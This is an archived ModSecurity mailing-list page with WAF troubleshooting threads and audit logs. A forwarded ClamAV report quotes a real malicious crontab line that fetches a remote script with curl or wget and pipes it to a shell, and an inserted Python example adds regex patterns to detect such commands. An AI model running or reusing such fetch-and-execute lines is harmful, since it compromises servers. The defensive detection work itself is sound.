mod-security-users Mailing List for ModSecurity (Page 30)
From: Ted T. <tal...@ho...> - 2019-05-03 09:54:03

Hi Christian

No sir, my question is based only on your tutorial. The point is that having an HTML response does not mean it is blocked, rather it means the opposite. Since in <title> you can write anything, which (403 Forbidden) is different from what you wrote as "We want to respond to such a request with HTTP status 403."

<title>403 Forbidden</title>

In short, we see no blocking (HTTP status 403) in <Step 7: Trying out the blockade>.

https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/

________________________________
From: Christian Folini <chr...@ne...>
Sent: Friday, May 3, 2019 8:52 AM
To: mod...@li...
Subject: Re: [mod-security-users] Help (Mistake with Mod_security blocking list)

Hi Ted,

You may want to share your configuration with us so we can understand why it is not blocking. You did add the rule to block this, did you not?

Cheers,

Christian

On Fri, May 03, 2019 at 08:44:56AM +0000, Ted Talaiti wrote:
> Hello
>
> In the following tutorial, you wrote "access to a specific URI on the server is blocked. We want to respond to such a request with HTTP status 403."
> When you try out the blockade,
>
> $> curl http://localhost/phpmyadmin
>
> It didn't block (since no such HTTP status 403), rather the access is allowed to the URI.
>
> https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/
>
> Please correct me if I am wrong.
> Regards

_______________________________________________
mod-security-users mailing list
mod...@li...
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
http://www.modsecurity.org/projects/commercial/rules/
http://www.modsecurity.org/projects/commercial/support/

From: Christian F. <chr...@ne...> - 2019-05-03 08:53:02

Hi Ted,

You may want to share your configuration with us so we can understand why it is not blocking. You did add the rule to block this, did you not?

Cheers,

Christian

On Fri, May 03, 2019 at 08:44:56AM +0000, Ted Talaiti wrote:
> Hello
>
> In the following tutorial, you wrote "access to a specific URI on the server is blocked. We want to respond to such a request with HTTP status 403."
> When you try out the blockade,
>
> $> curl http://localhost/phpmyadmin
>
> It didn't block (since no such HTTP status 403), rather the access is allowed to the URI.
>
> https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/
>
> Please correct me if I am wrong.
> Regards

From: Ted T. <tal...@ho...> - 2019-05-03 08:45:11

Hello

In the following tutorial, you wrote "access to a specific URI on the server is blocked. We want to respond to such a request with HTTP status 403."
When you try out the blockade,

$> curl http://localhost/phpmyadmin

It didn't block (since no such HTTP status 403), rather the access is allowed to the URI.

https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/

Please correct me if I am wrong.
Regards

From: Christian F. <chr...@ne...> - 2019-05-02 12:00:50

Hello,

The OWASP ModSecurity Core Rule Set project news for May 2019 are out:
https://coreruleset.org/20190501/crs-project-news-may-2019/

Retweets are welcome:
https://twitter.com/CoreRuleSet/status/1123919574762754050

This month, we cover the pending regular expression DoS problems on ModSec3 with CRS at higher paranoia levels. And some additional info you might like.

Best,

Christian

--
One sign that you’ve approached actual mastery of a subject is that you get less arrogant; because you’ve spent so much time being wrong.
-- Matthew D. Green

From: Sadaf M. <sad...@gm...> - 2019-05-01 22:44:46

From: Eero V. <eer...@ik...> - 2019-04-25 15:24:32

Just copy the rules and config files. Some Linux knowledge is required..

Eero

On Thu, Apr 25, 2019, 18:21 Ted Talaiti <tal...@ho...> wrote:
> Hi thanks for your reply.
> But there is no information on exporting/importing modsecurity/CRS from
> one server/Linux to another.
> Please shed some light.
> Thanks a lot.

From: Ted T. <tal...@ho...> - 2019-04-25 15:21:03

Hi thanks for your reply.
But there is no information on exporting/importing modsecurity/CRS from one server/Linux to another.
Please shed some light.
Thanks a lot.

________________________________
From: Christian Folini <chr...@ne...>
Sent: Thursday, April 25, 2019 12:56:25 PM
To: mod...@li...
Subject: Re: [mod-security-users] Help (migrate Mod_security with CRS)

Hi Ted,

I suggest you take a peek at the detailed tutorials at
https://netnea.com/apache-tutorials

They are meant to cover your use case.

Best,

Christian

From: Christian F. <chr...@ne...> - 2019-04-25 12:56:37

Hi Ted,

I suggest you take a peek at the detailed tutorials at
https://netnea.com/apache-tutorials

They are meant to cover your use case.

Best,

Christian

On Thu, Apr 25, 2019 at 12:38:18PM +0000, Ted Talaiti wrote:
> Hello
>
> I need to implement Mod_security with CRS in an Apache server on Linux in AWS from scratch, and then test it.
> Is there any detailed description of the steps of Mod_security installation and configuration (in Apache) available, please?
>
> Can we move a well-configured Mod_security with CRS from a server in AWS to another server in a different cloud?
>
> Thanks a lot for your attention.
> Sincerely

From: Eero V. <eer...@ik...> - 2019-04-25 12:41:41

How about reading the documentation: https://www.modsecurity.org/CRS/Documentation/

Yes, you can copy the installation to another server.. too.

On Thu, Apr 25, 2019 at 3:39 PM Ted Talaiti <tal...@ho...> wrote:
> Hello
>
> I need to implement Mod_security with CRS in an Apache server on Linux in
> AWS from scratch, and then test it.
> Is there any detailed description of the steps of Mod_security installation
> and configuration (in Apache) available, please?
>
> Can we move a well-configured Mod_security with CRS from a server in AWS
> to another server in a different cloud?
>
> Thanks a lot for your attention.
> Sincerely

From: Ted T. <tal...@ho...> - 2019-04-25 12:38:35

Hello

I need to implement Mod_security with CRS in an Apache server on Linux in AWS from scratch, and then test it.
Is there any detailed description of the steps of Mod_security installation and configuration (in Apache) available, please?

Can we move a well-configured Mod_security with CRS from a server in AWS to another server in a different cloud?

Thanks a lot for your attention.
Sincerely

From: Brent C. <bre...@gm...> - 2019-04-25 12:22:00

Good day Guys

I just came across the following on the ClamAV mailing list.

Is this not something that can be added to the ModSecurity ruleset? For example look at '||wget' and ')|sh'.

Regards
Brent Clark

-------- Forwarded Message --------
Subject: [clamav-users] LSD Malwares
Date: Thu, 25 Apr 2019 14:52:05 +0530
From: Xavier Maysonnave via clamav-users <cla...@li...>
Reply-To: ClamAV users ML <cla...@li...>
To: cla...@li...
CC: Xavier Maysonnave <x.m...@gm...>

Dear Friends,

We recently faced an Atlassian Confluence issue. Atlassian issued a security advisory on 29/03/2019 <https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>. Following this thread <https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>, we understood what happened on our server.

Confluence is running in its own user space and has seen its crontab hacked. On our Debian Stretch, 'crontab -u confluence -e' shows a non-legit instruction:

*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O- https://dd.heheda.tk/i.jpg)|sh

Obviously the security flaw in Confluence opened the gate to this behaviour. As we are running Confluence in its own user space, the i.jpg which contains the shell script didn't harm our server. No malware has been deployed; however the server was shutting down immediately after starting. We cleaned up the crontab and upgraded Confluence to avoid any further infection.

However we need to check our installation and I'm wondering if ClamAV already knows this malware family <https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>. I already opened a report to ClamAV. Is there any user who faced this issue, and is ClamAV ready to detect and clean up our Linux boxes?

Any pointers about any information about this LSD Malware family will be greatly appreciated as I try to evaluate the risks for our infrastructure (I checked various DBs with no success and googled too).

Warmly.

Light Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>

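Brent's question is whether the two tokens he points at, '||wget' and ')|sh', can be turned into a detection. The Python below is an added example written for this page; it is not a CRS rule and not code from either mailing list (CRS carries its own remote-command-execution rules, and anything deployed in front of real traffic would need the usual false-positive review first). It URL-decodes the input the way a WAF has to before matching, then runs three narrow patterns over the crontab line quoted above and over constructed payloads. The pattern names, `normalize` and `match_download_to_shell` are this example's own, and example.invalid is a placeholder host.

```python
"""Detect "fetch a remote script and pipe it into a shell" in request data.
Added example for this list page, not a CRS rule; samples are constructed
except for the crontab line, which is the one forwarded above."""
import re
from urllib.parse import unquote_plus

SHELL = r"(?:ba|da|z|k)?sh"

# One pattern per token Brent points at, plus the plain "downloader | sh" form.
PATTERNS = {
    # curl/wget, its arguments, then a pipe straight into a shell
    "download_pipe_shell": re.compile(
        rf"\b(?:curl|wget)\b[^|;&\n]*\|\s*{SHELL}\b", re.I),
    # ( ... )|sh : output of a subshell piped into a shell
    "subshell_pipe_shell": re.compile(rf"\)\s*\|\s*{SHELL}\b", re.I),
    # ...||wget : fallback downloader if the first one is missing
    "or_fallback_downloader": re.compile(r"\|\|\s*(?:curl|wget)\b", re.I),
}


def normalize(payload: str, rounds: int = 2) -> str:
    """Undo up to `rounds` layers of URL encoding (parameters arrive %-encoded,
    sometimes twice) and collapse whitespace so `|   sh` and `|sh` look alike."""
    text = payload
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text)


def match_download_to_shell(payload: str) -> list:
    """Names of the patterns that hit, in PATTERNS order (empty list = clean)."""
    text = normalize(payload)
    return [name for name, rx in PATTERNS.items() if rx.search(text)]


# Samples: the crontab line from the forwarded mail, a URL-encoded form
# parameter carrying the same construct (constructed), and benign inputs.
CRON_LINE = ("*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg"
             "||wget -q -O- https://dd.heheda.tk/i.jpg)|sh")
ENCODED_PARAM = ("cmd=%28curl+-fsSL+http%3A%2F%2Fexample.invalid%2Fi.jpg"
                 "%7C%7Cwget+-q+-O-+http%3A%2F%2Fexample.invalid%2Fi.jpg%29%7Csh")
BENIGN = [
    "wget -q https://example.invalid/pkg.tar.gz && tar xzf pkg.tar.gz",
    "echo hello | shasum",
    "search=fish||chips",
]

if __name__ == "__main__":
    for sample in [CRON_LINE, ENCODED_PARAM, *BENIGN]:
        print(match_download_to_shell(sample) or "-", "<=", sample[:60])
```

The third pattern on its own is deliberately loose (`||` followed by a downloader also appears in legitimate shell scripts), which is why the result is a list of which patterns fired rather than a single verdict: a rule built from this would score the tokens, not block on any one of them.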
From: Christian V. <cv...@it...> - 2019-04-23 16:44:16

Thanks Ervin, I didn't note the size of Content-Length, for sure this is not a normal request :P

Cheers.

On 22-04-19 at 17:10, Ervin Hegedüs wrote:
> Hi Christian,
>
> On Mon, Apr 22, 2019 at 04:22:27PM -0300, Christian Varas wrote:
>> Hello, I'm having a small issue with modsecurity and nginx
>>
>> I'm getting the following blocking with the rule "GET or HEAD Request
>> with Body Content."
>>
>> The thing is that this rule is catching a wrong method.
>>
>> I'm sending this POST with a normal body content
> I think this isn't a "normal" request :)
>
>> POST /informacion-general-de-bomberos HTTP/1.1
>> Host: www.bomberos.cl
>> Content-Length: 33480
> ^^^^^^^^^^^^^^^^^^^^^^^
> I think Nginx waits for a 33480-length body, but only got 441 - I
> assume that this is a unique Nginx behavior....
>
> I've tried your request, only replaced the Content-Length to 424,
> and everything worked well.
>
> Hope this helps.
>
> a.

--
Chris

From: Ervin H. <ai...@gm...> - 2019-04-22 21:10:12

Hi Christian,

On Mon, Apr 22, 2019 at 04:22:27PM -0300, Christian Varas wrote:
> Hello, I'm having a small issue with modsecurity and nginx
>
> I'm getting the following blocking with the rule "GET or HEAD Request
> with Body Content."
>
> The thing is that this rule is catching a wrong method.
>
> I'm sending this POST with a normal body content

I think this isn't a "normal" request :)

> POST /informacion-general-de-bomberos HTTP/1.1
> Host: www.bomberos.cl
> Content-Length: 33480
  ^^^^^^^^^^^^^^^^^^^^^^^
> Cache-Control: max-age=0
...
> Connection: close

the body starts here:

>
> ------WebKitFormBoundary85SDZfedhQBpvDB6
> Content-Disposition: form-data; name="q"
>
> #
> ------WebKitFormBoundary85SDZfedhQBpvDB6
> Content-Disposition: form-data; name="option"
>
> com_contenido
> ------WebKitFormBoundary85SDZfedhQBpvDB6
> Content-Disposition: form-data; name="Itemid"
>
> 647
> ------WebKitFormBoundary85SDZfedhQBpvDB6
> Content-Disposition: form-data; name="task"
>
> buscarContenido
> ------WebKitFormBoundary85SDZfedhQBpvDB6--

the length of the body is 424 chars (plus the CR characters at the end of the lines, there are 17 - so 424+17 = 441).

> "headers":{"Accept":"text/html...", ... ,"Content-Length":"441"
> "components":["OWASP_CRS/3.1.0\""]},"messages":[{"message":"GET or HEAD Request with Body Content.","details":{"match":"Matched \"Operator `Rx' with parameter `^0?$' against variable `REQUEST_HEADERS:Content-Length' (Value: `441')",

I think Nginx waits for a 33480-length body, but only got 441 - I assume that this is a unique Nginx behavior....

I've tried your request, only replaced the Content-Length to 424, and everything worked well.

Hope this helps.


a.

From: Jose R R <jos...@me...> - 2019-04-22 20:43:14

Niltze, Chris-

"I haven't updated the components in a few months, maybe in a new version this is fixed."

If you are using ModSecurity v3 with the libmodsecurity3 Nginx Connector module, you might as well 'update your components'. Recently I integrated the libmodsecurity3 Nginx Connector module into Nginx 1.15.9 for a Debian packaging build for a migration, deployed it, and I have not experienced anything similar to what you describe.

---------- Forwarded message ---------
From: Christian Varas <cv...@it...>
Date: Mon, Apr 22, 2019 at 12:23 PM
Subject: [mod-security-users] Rule "GET or HEAD Request with Body Content." is catching a "POST" method
To: <mod...@li...>

Hello, I'm having a small issue with modsecurity and nginx

I'm getting the following blocking with the rule "GET or HEAD Request with Body Content."

The thing is that this rule is catching a wrong method.

I'm sending this POST with a normal body content

POST /informacion-general-de-bomberos HTTP/1.1
Host: www.bomberos.cl
Content-Length: 33480
Cache-Control: max-age=0
Origin: http://www.bomberos.cl
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary85SDZfedhQBpvDB6
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.bomberos.cl/informacion-general-de-bomberos
Accept-Encoding: gzip, deflate
Accept-Language: es-MX,es;q=0.9,en-US;q=0.8,en;q=0.7,es-419;q=0.6
Cookie: 3207237d144523bf443786e09bde1502=plvhocs15n7eqp53og9mv9oq35; __utma=153413291.1309598240.1555956994.1555956994.1555956994.1; __utmc=153413291; __utmz=153413291.1555956994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=153413291.7.10.1555956994
Connection: close

------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="q"

#
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="option"

com_contenido
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="Itemid"

647
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="task"

buscarContenido
------WebKitFormBoundary85SDZfedhQBpvDB6--

This is the blocking info (catching a GET method but the request sent is a POST):

Raw log:

{"transaction":{"client_ip":"190.215.55.78","time_stamp":"Mon Apr 22 14:34:45 2019","server_id":"7c160a00ee79198f898d4dd10daa0650753069e4","client_port":51391,"host_ip":"190.215.55.78","host_port":80,"unique_id":"155595808524.898826","request":{"method":"GET","http_version":1.1,"uri":"/informacion-general-de-bomberos","body":"------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition: form-data; name=\"q\"\r\n\r\n#\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition: form-data; name=\"option\"\r\n\r\ncom_contenido\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition: form-data; name=\"Itemid\"\r\n\r\n647\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition: form-data; name=\"task\"\r\n\r\nbuscarContenido\r\n------WebKitFormBoundary85SDZfedhQBpvDB6--\r\n","headers":{"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","Cache-Control":"max-age=0","Content-Type":"multipart/form-data; boundary=----WebKitFormBoundary85SDZfedhQBpvDB6","User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36","DNT":"1","Origin":"http://www.bomberos.cl","Upgrade-Insecure-Requests":"1","Referer":"http://www.bomberos.cl/informacion-general-de-bomberos","Content-Length":"441","Host":"www.bomberos.cl","Accept-Encoding":"gzip, deflate","Cookie":"3207237d144523bf443786e09bde1502=plvhocs15n7eqp53og9mv9oq35; __utma=153413291.1309598240.1555956994.1555956994.1555956994.1; __utmc=153413291; __utmz=153413291.1555956994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=153413291.7.10.1555956994","Accept-Language":"es-MX,es;q=0.9,en-US;q=0.8,en;q=0.7,es-419;q=0.6","Connection":"close"}},"response":{"http_code":403},"producer":{"modsecurity":"ModSecurity v3.0.3 (Linux)","connector":"ModSecurity-nginx v1.0.0","secrules_engine":"Enabled","components":["OWASP_CRS/3.1.0\""]},"messages":[{"message":"GET or HEAD Request with Body Content.","details":{"match":"Matched \"Operator `Rx' with parameter `^0?$' against variable `REQUEST_HEADERS:Content-Length' (Value: `441' )","reference":"o0,3v0,3v84,3","ruleId":"920170","file":"/opt/waf/nginx/etc/modsec_rules/www.bomberos.cl/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"229","data":"GET","severity":"2","ver":"OWASP_CRS/3.1.0","rev":"","tags":[],"maturity":"0","accuracy":"0"}},{"message":"GET or HEAD Request with Body Content.","details":{"match":"Matched \"Operator `Rx' with parameter `^0?$' against variable `REQUEST_HEADERS:Content-Length' (Value: `441' )","reference":"o0,3v0,3v84,3","ruleId":"920170","file":"/opt/waf/nginx/etc/modsec_rules/www.bomberos.cl/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"229","data":"GET","severity":"2","ver":"OWASP_CRS/3.1.0","rev":"","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ","CAPEC-272"],"maturity":"0","accuracy":"0"}}]}}

Does anyone have the same issue?

I haven't updated the components in a few months, maybe in a new version this is fixed.

Cheers.
Chris.

[]

Best Professional Regards.

--
Jose R R
http://metztli.it
---------------------------------------------------------------------------------------------
Download Metztli Reiser4: Debian Stretch w/ Linux 4.20 AMD64
---------------------------------------------------------------------------------------------
feats ZSTD compression https://sf.net/projects/metztli-reiser4/
-------------------------------------------------------------------------------------------
Official current Reiser4 resources: https://reiser4.wiki.kernel.org/

|
From: Christian V. <cv...@it...> - 2019-04-22 19:22:42
Hello, I'm having a small issue with ModSecurity and Nginx. I'm getting the following block with the rule "GET or HEAD Request with Body Content." The thing is that this rule is catching the wrong method. I'm sending this POST with normal body content:

*POST* /informacion-general-de-bomberos HTTP/1.1
Host: www.bomberos.cl
Content-Length: 33480
Cache-Control: max-age=0
Origin: http://www.bomberos.cl
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary85SDZfedhQBpvDB6
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.bomberos.cl/informacion-general-de-bomberos
Accept-Encoding: gzip, deflate
Accept-Language: es-MX,es;q=0.9,en-US;q=0.8,en;q=0.7,es-419;q=0.6
Cookie: 3207237d144523bf443786e09bde1502=plvhocs15n7eqp53og9mv9oq35; __utma=153413291.1309598240.1555956994.1555956994.1555956994.1; __utmc=153413291; __utmz=153413291.1555956994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=153413291.7.10.1555956994
Connection: close

------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="q"

#
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="option"

com_contenido
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="Itemid"

647
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="task"

buscarContenido
------WebKitFormBoundary85SDZfedhQBpvDB6--

This is the blocking info (catching a GET method but the request sent is a POST):

Raw log:
{"transaction":{"client_ip":"190.215.55.78","time_stamp":"Mon Apr 22 14:34:45 2019","server_id":"7c160a00ee79198f898d4dd10daa0650753069e4","client_port":51391,"host_ip":"190.215.55.78","host_port":80,"unique_id":"155595808524.898826","request":{"method":"GET","http_version":1.1,"uri":"/informacion-general-de-bomberos","body":"------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition: form-data; name=\"q\"\r\n\r\n#\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition: form-data; name=\"option\"\r\n\r\ncom_contenido\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition: form-data; name=\"Itemid\"\r\n\r\n647\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition: form-data; name=\"task\"\r\n\r\nbuscarContenido\r\n------WebKitFormBoundary85SDZfedhQBpvDB6--\r\n","headers":{"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","Cache-Control":"max-age=0","Content-Type":"multipart/form-data; boundary=----WebKitFormBoundary85SDZfedhQBpvDB6","User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36","DNT":"1","Origin":"http://www.bomberos.cl","Upgrade-Insecure-Requests":"1","Referer":"http://www.bomberos.cl/informacion-general-de-bomberos","Content-Length":"441","Host":"www.bomberos.cl","Accept-Encoding":"gzip, deflate","Cookie":"3207237d144523bf443786e09bde1502=plvhocs15n7eqp53og9mv9oq35; __utma=153413291.1309598240.1555956994.1555956994.1555956994.1; __utmc=153413291; __utmz=153413291.1555956994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=153413291.7.10.1555956994","Accept-Language":"es-MX,es;q=0.9,en-US;q=0.8,en;q=0.7,es-419;q=0.6","Connection":"close"}},"response":{"http_code":403},"producer":{"modsecurity":"ModSecurity v3.0.3 (Linux)","connector":"ModSecurity-nginx v1.0.0","secrules_engine":"Enabled","components":["OWASP_CRS/3.1.0\""]},"messages":[{"message":"GET or HEAD Request with Body Content.","details":{"match":"Matched \"Operator `Rx' with parameter `^0?$' against variable `REQUEST_HEADERS:Content-Length' (Value: `441' )","reference":"o0,3v0,3v84,3","ruleId":"920170","file":"/opt/waf/nginx/etc/modsec_rules/www.bomberos.cl/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"229","data":"GET","severity":"2","ver":"OWASP_CRS/3.1.0","rev":"","tags":[],"maturity":"0","accuracy":"0"}},{"message":"GET or HEAD Request with Body Content.","details":{"match":"Matched \"Operator `Rx' with parameter `^0?$' against variable `REQUEST_HEADERS:Content-Length' (Value: `441' )","reference":"o0,3v0,3v84,3","ruleId":"920170","file":"/opt/waf/nginx/etc/modsec_rules/www.bomberos.cl/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"229","data":"GET","severity":"2","ver":"OWASP_CRS/3.1.0","rev":"","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ","CAPEC-272"],"maturity":"0","accuracy":"0"}}]}}

Does anyone have the same issue? I haven't updated the components in a few months; maybe in a new version this is fixed.

Cheers.
Chris.
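One way to triage reports like this one from the libmodsecurity3 serial (one JSON object per line) audit log, added here as an example that is not part of the thread: it finds transactions where rule 920170 fired and cross-checks the method the engine recorded against the request headers, so that entries where the engine saw GET but the headers describe a multipart or form POST are set aside for an engine/connector look rather than treated as a client violation. The entries, client addresses and `triage` helper are constructed for the example, modelled on the log above.

```python
import json

# Rule id from CRS REQUEST-920-PROTOCOL-ENFORCEMENT.conf that fired in the thread.
RULE_GET_HEAD_WITH_BODY = "920170"

# Content types a browser form or API client sends with a body; one of these plus a
# non-zero Content-Length means the request was almost certainly not a real GET.
BODY_CONTENT_TYPES = ("multipart/form-data", "application/x-www-form-urlencoded",
                      "application/json", "application/xml", "text/xml")


def _entry(unique_id, method, headers, rule_ids, code):
    """Build one constructed audit entry in the libmodsecurity3 serial JSON shape."""
    return json.dumps({"transaction": {
        "client_ip": "192.0.2.10", "unique_id": unique_id,
        "request": {"method": method, "uri": "/informacion-general-de-bomberos",
                    "headers": headers},
        "response": {"http_code": code},
        "messages": [{"message": "GET or HEAD Request with Body Content.",
                      "details": {"ruleId": rid, "data": method}} for rid in rule_ids],
    }})


# Constructed sample log, one JSON object per line, modelled on the thread's entry.
SAMPLE_AUDIT_LOG = "\n".join([
    # The thread's case: the engine logged GET, but the headers describe a form POST.
    _entry("constructed-1", "GET",
           {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary85SDZfedhQBpvDB6",
            "Content-Length": "441", "Host": "www.bomberos.cl"}, ["920170"], 403),
    # A genuine 920170 hit: a GET that declares a body but no body content type.
    _entry("constructed-2", "GET", {"Content-Length": "12", "Host": "www.bomberos.cl"},
           ["920170"], 403),
    # An ordinary POST that passed; nothing fired.
    _entry("constructed-3", "POST", {"Content-Type": "application/x-www-form-urlencoded",
                                     "Content-Length": "27"}, [], 200),
    "not json: a partially written line the parser must survive",
])


def parse_audit_entries(text):
    """Parse a serial (one object per line) v3 audit log, skipping non-JSON noise."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            entries.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # partial write or stray text: skip it rather than abort triage
    return entries


def fired_rule_ids(tx):
    """Set of rule ids recorded in the transaction's messages array."""
    return {m.get("details", {}).get("ruleId") for m in tx.get("messages", [])}


def _lower_headers(headers):
    # The audit log keeps the client's header casing; normalise it for lookups.
    return {k.lower(): v for k, v in headers.items()}


def looks_like_body_request(headers):
    """True when the headers say a body with a form/API content type was sent."""
    lower = _lower_headers(headers)
    ctype = lower.get("content-type", "").split(";")[0].strip().lower()
    try:
        length = int(lower.get("content-length", "0"))
    except ValueError:
        length = 0
    return length > 0 and ctype in BODY_CONTENT_TYPES


def find_method_body_mismatches(entries):
    """Transactions where 920170 fired on a GET/HEAD whose headers look like a real POST.

    Those point at the engine/connector (what method did it hand to the rules?)
    and deserve a look before anyone writes a rule exclusion or blames the client.
    """
    suspects = []
    for entry in entries:
        tx = entry.get("transaction", {})
        if RULE_GET_HEAD_WITH_BODY not in fired_rule_ids(tx):
            continue
        req = tx.get("request", {})
        headers = _lower_headers(req.get("headers", {}))
        if req.get("method") in ("GET", "HEAD") and looks_like_body_request(headers):
            suspects.append({"unique_id": tx.get("unique_id"), "client_ip": tx.get("client_ip"),
                             "uri": req.get("uri"), "logged_method": req.get("method"),
                             "content_type": headers.get("content-type"),
                             "content_length": headers.get("content-length")})
    return suspects


def triage(text):
    """Parse a raw serial audit log and return the suspicious transactions."""
    return find_method_body_mismatches(parse_audit_entries(text))
```

Running `triage(SAMPLE_AUDIT_LOG)` returns only the constructed-1 transaction; the GET with a bare Content-Length stays a legitimate 920170 hit.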
From: Don C. <don...@gm...> - 2019-04-21 08:54:53
ezNetScan is a network scanning tool; it scans a wireless network and displays the list of all devices that are connected to your network.

Available on Google Play: https://play.google.com/store/apps/details?id=com.vrsspl.eznetscan
From: Osama E. <oel...@gm...> - 2019-04-21 01:10:43
Found that only Error logs + health info is sent to the Event Logs, so disabling error logs solved it (nolog). That’s also why they weren’t sanitized.

Thanks.

--
Osama Elnaggar

On April 19, 2019 at 10:25:21 PM, Osama Elnaggar (oel...@gm...) wrote:

> Hi,
>
> When running ModSecurity on IIS, I was wondering if there was any way to disable event logging for audit logs. Is there some option to disable this? I would prefer that only health-related data be sent to the Event Log, such as if ModSecurity failed to start, etc., while normal audit logs be sent to a file that I can then forward to my SIEM. I’m able to send audit logs to another file but they are still mirrored to the event log as well.
>
> Also, from my limited testing, it appears that arguments are not sanitized when sent to the Windows Event Log, which is a concern. The normal audit log (modsec_audit.log) sanitizes them properly but not the event log. Is this a known issue?
>
> Thanks.
>
> --
> Osama Elnaggar
From: Osama E. <oel...@gm...> - 2019-04-19 12:25:29
Hi,

When running ModSecurity on IIS, I was wondering if there was any way to disable event logging for audit logs. Is there some option to disable this? I would prefer that only health-related data be sent to the Event Log, such as if ModSecurity failed to start, etc., while normal audit logs be sent to a file that I can then forward to my SIEM. I’m able to send audit logs to another file but they are still mirrored to the event log as well.

Also, from my limited testing, it appears that arguments are not sanitized when sent to the Windows Event Log, which is a concern. The normal audit log (modsec_audit.log) sanitizes them properly but not the event log. Is this a known issue?

Thanks.

--
Osama Elnaggar
From: Christian V. <cv...@it...> - 2019-04-17 16:19:19
Hi, there are tons of posts about how to use sqlmap on Google and YouTube. This list is to discuss things about ModSecurity.

Cheers.

On 17-04-19 at 10:24, Turritopsis Dohrnii Teo En Ming wrote:
> Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?
>
> Good evening from Singapore,
>
> Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP).
>
> We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log.
>
> Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again. I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode.
>
